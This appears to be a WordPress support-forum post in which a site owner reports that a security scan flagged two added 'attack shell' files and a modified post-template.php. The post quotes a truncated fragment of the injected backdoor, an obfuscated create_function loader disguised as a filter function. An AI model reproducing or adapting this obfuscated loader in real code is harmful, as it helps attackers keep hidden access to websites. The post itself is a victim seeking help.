Core Files Modified or Added – Is this ever legitimate?
-
Hi,
I believe my site has been hacked, but there’s nothing obvious happening as far as I can see. I ran a scan (using the Wordfence plugin) and it found 3 issues. One is a modification to the post-template.php file; the other two are files within the core WordPress folders that are NOT part of the original installation. Before I go deleting things (I have backups, so hopefully nothing un-fixable will happen) I wanted to make sure that I’m understanding things correctly. Is there ever a time when a theme or plugins or any other “extra” WordPress thing adds to or modifies the core files legitimately?
The files that had issues and the warnings about them are:
wp-admin/includes/class-wp-theme-edit.php – “Appears to be an attack shell”
wp-admin/css/options-meta.php – “Appears to be an attack shell” – both of these shells mention backdoor access
wp-includes/post-template.php – Modified – on one line (167) there was an “applyfilter” added, then a bunch of stuff lower down (around line 686) starting with a note,
`* Applies custom filter.
*
* @since 0.71
*
* $text string to apply the filter
* @return string
*/
function applyfilter($text=null) {
@ini_set(‘memory_limit’,’256M’);
if($text) @ob_start();
if(1){global $O10O1OO1O;$O10O1OO1O=create_function(‘$s,$k’,”\44\163\75\165\162\154\144\145\143\157\144\145\50\44\”`
and it continues on like that with bunch more numbers, etc. and some other weird looking code or something. I don’t know anything about php files or really very much about any of this stuff. Any help would be appreciated.Thanks!
- The topic ‘Core Files Modified or Added – Is this ever legitimate?’ is closed to new replies.